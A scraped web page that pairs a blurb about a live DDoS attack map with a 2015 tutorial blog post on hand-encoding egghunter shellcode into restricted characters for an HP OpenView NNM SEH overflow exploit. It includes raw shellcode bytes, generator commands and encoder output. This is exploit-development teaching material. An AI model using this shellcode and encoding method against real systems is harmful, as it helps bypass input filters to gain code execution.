Live Ddos View

Live DDoS Attack Map

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about the distributed denial of service attacks that take place around the world every day.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

  • Use the histogram at the bottom of the map to explore historical data.
  • Select a country to view DDoS activity to or from that country.
  • Use the color option to view attacks by class, duration, or source/destination port.
  • Use the news section to find online reports of attack activity from a specified time.
  • View the gallery to explore some examples of days with notable DDoS attacks.

Monday, June 1, 2015

Manual Egghunter/Shellcode Encoding using Python

You are probably wondering what this post is all about. Well, it's about manually encoding egghunter shellcode.
Why would you want to manually encode the shellcode if you have built-in encoders in the Metasploit Framework?
Before we begin, have a look at the following exploit by muts: HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit.
I won't go into much detail about the process, because most of it has already been discussed in the Offensive Security HP NNM 0day Presentation and on Peter Van Eeckhoutte's blog, in Exploit writing tutorial part 8: Win32 Egg Hunting, in the sections "Hand-crafting the encoder" and "Seeing this code run and reproduce the original egghunter is nice, but how can you build your own decoder?".
What I'm about to show here is the calculations made in order for our shellcode to be free of bad chars. Doing this manually can be a pain.
Due to the large number of bad characters, we need to manually encode the egghunter using a limited set of allowed chars. Using Python, we can have a script do the calculations for us.
Again, I assume you have watched the OffSec video and read the tutorials, and already know what we are about to do here.
Detailed information about egghunters can be found in this document by skape:
1. Get the egghunter source code here: http://www.hick.org/code/skape/shellcode/win32/
or get them compiled to binaries here:
  • egghunt.exe (Compiled Egg, 52 kB)
  • egghunt_syscall.exe (Compiled syscall egg, 52 kB)
2. Generate the egghunter shellcode
C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
3. Break down our 32-byte egghunter shellcode into 8 sets of 4 bytes:
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
4. We will use the following value as an example:
"\x0f\x42\x52\x6a"
Read as a little-endian dword, this is 0x6a52420f. Take its two's complement:
0xFFFFFFFF - 0x6a52420f + 1 = 0x95ADBDF1
We need to find three numbers (built from the allowed character set) which, when added, give 0x95ADBDF1.
Instead of calculating this manually, we will use a custom-made Python script.
Now let's split it in two, 95AD and BDF1, and feed these values into our script:
* The script contains a list of allowed chars and uses it for its calculations.
exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!!
0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!!
0x7f7f 0x3d71 0x0101
Joining the matching high and low halves from the two runs gives three dwords:
7f7f7f7f
152d3d71
01010101
Let's add our results and voilà, we now have values made from the allowed char set only:
7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1
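The arithmetic in step 4 can be checked mechanically. The script below is an added example, not the encoder.py used in the post (which is not shown on this page); the function names are assumptions made for illustration. It re-derives the target from the chunk, rejoins the per-half results, and flags the one case where solving the halves separately goes wrong: a carry out of the low half.

```python
MASK32 = 0xFFFFFFFF

def le_dword(chunk: bytes) -> int:
    """Read a 4-byte chunk as a little-endian 32-bit value."""
    if len(chunk) != 4:
        raise ValueError("chunk must be exactly 4 bytes")
    return int.from_bytes(chunk, "little")

def twos_complement(value: int) -> int:
    """0xFFFFFFFF - value + 1, kept to 32 bits (step 4 of the post)."""
    return (MASK32 - value + 1) & MASK32

def join_halves(high: int, low: int) -> int:
    """Rebuild a dword from 16-bit halves that were computed separately."""
    return ((high & 0xFFFF) << 16) | (low & 0xFFFF)

def check_split(chunk: bytes, high_parts, low_parts) -> dict:
    """Check a per-half decomposition against the chunk it was made for."""
    if len(high_parts) != len(low_parts):
        raise ValueError("need one low half for every high half")
    target = twos_complement(le_dword(chunk))
    operands = [join_halves(h, l) for h, l in zip(high_parts, low_parts)]
    total = sum(operands)
    return {
        "target": target,
        "operands": operands,
        "sum_matches": (total & MASK32) == target,
        # A carry out of the low halves adds 1 to the high half, so halves
        # solved independently only recombine cleanly when this is 0.
        "low_carry": sum(low_parts) >> 16,
        # Two's complement identity: when the sum equals the target,
        # 0 - sum wraps back to the input dword.
        "recovered": (0 - total) & MASK32,
    }

# Values copied from the worked example in the post.
CHUNK = bytes.fromhex("0f42526a")
HIGH_PARTS = [0x7F7F, 0x152D, 0x0101]  # printed for 95AD
LOW_PARTS = [0x7F7F, 0x3D71, 0x0101]   # printed for BDF1

if __name__ == "__main__":
    report = check_split(CHUNK, HIGH_PARTS, LOW_PARTS)
    print("target     0x%08X" % report["target"])
    print("operands  ", " ".join("0x%08x" % op for op in report["operands"]))
    print("sum ok    ", report["sum_matches"], " low carry:", report["low_carry"])
    print("recovered  0x%08X" % report["recovered"])
```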

